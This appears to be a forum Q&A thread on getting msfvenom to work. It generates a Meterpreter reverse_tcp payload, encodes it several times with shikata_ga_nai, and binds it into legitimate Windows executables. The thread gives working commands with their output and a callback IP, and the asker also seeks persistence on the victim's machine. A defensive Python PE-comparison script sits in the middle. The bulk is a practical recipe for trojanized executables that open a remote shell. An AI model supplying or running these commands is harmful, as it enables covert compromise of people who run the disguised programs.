```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 -a x86 R |msfvenom -e -t exe -x minipad.exe -k -o minipad123.exe -e x86/shikata_ga_nai -c 8
Attempting to read payload from STDIN...
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 299 bytes
Error: You must select an arch for a custom payload
```

The architecture has been specified, yet the error persists.

Any help??

Nico
RJ7
  • Why have two calls to msfvenom? Wouldn't one call suffice with all the parameters? – Maximilian Gerhardt Sep 05 '15 at 11:23
  • Yeah, I have tried that as well, but in vain... If you feel any particular call will work, please post the syntax. Thanks! – RJ7 Sep 05 '15 at 11:28
  • The problem is that with `-c 8` you probably mean that you want 8 iterations, but you do that with the `-i` switch. How about `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 --platform win -a x86 -f exe -o minipad123.exe -e x86/shikata_ga_nai -i8 -k -x minipad.exe` ? At least the cmd `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 --platform win -a x86 -f exe -o test.exe -e x86/shikata_ga_nai -i8` generates a valid executable for me with the `meterpreter/reverse_tcp` payload. All you want in addition is to add the payload to an existing file? – Maximilian Gerhardt Sep 05 '15 at 11:32
  • The cmd without the binding works fine for me as well but the first command gives me an error after the iterations. Error: undefined method `encoded' for nil:NilClass – RJ7 Sep 05 '15 at 11:44
  • Works for me. I copied a windows binary to my current directory. `cp /usr/share/windows-binaries/vncviewer.exe .` added the meterpreter payload `$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 --platform win -a x86 -f exe -o vncviewer_with_metasploit.exe -e x86/shikata_ga_nai -i8 -k -x vncviewer.exe` `Found 1 compatible encoders Attempting to encode payload with 8 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 326 (iteration=0) ... x86/shikata_ga_nai chosen with final size 515 Payload size: 515 bytes Saved as: vncviewer_with_metasploit.exe` – Maximilian Gerhardt Sep 05 '15 at 11:51
  • And what I get seems to be good; at least the file WITH the meterpreter is 60KB larger than the original. `root@kali:~# ls -lh vncviewer* -rwxr-xr-x 1 root root 356K Sep 5 13:48 vncviewer.exe -rw-r--r-- 1 root root 412K Sep 5 13:48 vncviewer_with_metasploit.exe` – Maximilian Gerhardt Sep 05 '15 at 11:53
  • I have the file minipad.exe in my home folder and I have done the exact same thing but getting the error of undefined method 'encoded'. – RJ7 Sep 05 '15 at 12:31
  • Does this error persist since I'm not using patch?? – RJ7 Sep 05 '15 at 17:07
  • Getting the ``Error: undefined method `encoded' for nil:NilClass`` error might be a sign of a wrong environment, e.g. broken `ruby` or other `metasploit` stuff. I would download Kali Linux in a virtual machine and try it from this clean state. Does metasploit work correctly currently? – Maximilian Gerhardt Sep 05 '15 at 17:12
  • Yeah, it's working fine, since whenever I want to create a single file it works well enough... But when I need to bind it doesn't, i.e. when I use -k -x filename.exe – RJ7 Sep 05 '15 at 18:06
  • Installing Kali Linux on a virtual machine and trying the same from there would work fine?? – RJ7 Sep 05 '15 at 18:16
  • I'm just saying you should have a clean environment to test this, especially because the commands are working fine on my machine. – Maximilian Gerhardt Sep 05 '15 at 18:21
  • Thanks a lot!!!... The idea for a clean environment worked like a charm. It works really well... Just one more question... Do you know any way to bind a text file containing text created by us... What we do works well for .exe files, but when we run the same for txt files it throws an error stating: Offset 0 outside of image source?? – RJ7 Sep 07 '15 at 14:17
  • .txt files are non-executable, so Metasploit's binding mechanism fails. The `-x – Maximilian Gerhardt Sep 07 '15 at 14:24
  • OK, so is there a way to create a batch file that once opened will be present on the system such that even when the executable is closed the session doesn't die?? This can actually be done by using RAT on Windows... Can this be done on Kali Linux as well? – RJ7 Sep 07 '15 at 14:55
  • If you're talking about persistence, have a look at what metasploit offers. https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/ – Maximilian Gerhardt Sep 07 '15 at 15:00
  • Thanks!!... I tried persistence but it says Error in script: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: Access is denied....... Then I tried metsvc as well and that also gives an error when I run metsvc saying cannot open the service manager(0x00000005)... Any idea?? – RJ7 Sep 08 '15 at 01:25
  • Thanks!!... Persistence seems to be what I want based on the document but it gives an error. It says Error in script: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: Access is denied....... Then I tried metsvc as well and that also gives an error when I run metsvc saying cannot open the service manager(0x00000005)... Any idea?? – RJ7 Sep 08 '15 at 02:20
  • Open another question for that. – Maximilian Gerhardt Sep 08 '15 at 12:54
  • Thanks for everything!! Learnt a lot from you :). – RJ7 Sep 09 '15 at 09:31
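For defenders, the size difference noted in the comments above is one sign that a shipped executable is not the vendor's original; comparing its hash, entry point and section table against a known-good copy gives more specific findings. This is an added example, not part of the original thread: the function names and the sample PE header bytes are constructed for illustration, and which fields actually differ depends on how a given file was modified.

```python
import hashlib
import struct

def pe_summary(data: bytes) -> dict:
    """Parse just enough of a PE header to fingerprint the image."""
    if data[:2] != b"MZ":  # e.g. a .txt file has no DOS/PE headers at all
        raise ValueError("not a PE image: no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: no PE signature")
    coff = e_lfanew + 4
    (n_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (entry,) = struct.unpack_from("<I", data, opt + 16)  # AddressOfEntryPoint
    table = opt + opt_size
    names = [data[table + 40 * i:table + 40 * i + 8].rstrip(b"\0").decode("ascii", "replace")
             for i in range(n_sections)]
    return {"entry": entry, "sections": names, "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest()}

def diff_against_baseline(baseline: bytes, suspect: bytes) -> list:
    """List the ways `suspect` differs from the known-good `baseline`."""
    good, sus = pe_summary(baseline), pe_summary(suspect)
    findings = []
    if good["sha256"] != sus["sha256"]:
        findings.append("hash mismatch")
    if good["size"] != sus["size"]:
        findings.append(f"size changed by {sus['size'] - good['size']} bytes")
    if good["entry"] != sus["entry"]:
        findings.append(f"entry point moved {good['entry']:#x} -> {sus['entry']:#x}")
    added = [s for s in sus["sections"] if s not in good["sections"]]
    if added:
        findings.append(f"new sections: {added}")
    return findings

def build_pe(sections, entry):
    """Constructed PE32 header bytes for the demo (headers only, not a program)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry).ljust(0xE0, b"\0")
    table = b"".join(n.encode().ljust(40, b"\0") for n in sections)
    return dos + b"PE\0\0" + coff + opt + table

GOOD = build_pe([".text", ".rdata", ".data"], 0x1000)             # constructed baseline
ALTERED = build_pe([".text", ".rdata", ".data", ".xyz"], 0x9000)  # constructed variant

if __name__ == "__main__":
    for finding in diff_against_baseline(GOOD, ALTERED):
        print(finding)
```

In practice the baseline bytes would come from the vendor's signed installer or a published hash, read with `open(path, "rb").read()`.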

1 Answer


In Kali Linux 2.0 (sana), it is necessary to provide the information in the following format:

```
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai --format=exe > windows.exe
```

It is necessary to specify the encoding type in Kali 2.0.

Now run the code.
Replace windows.exe with the location you desire.

Abby Fiz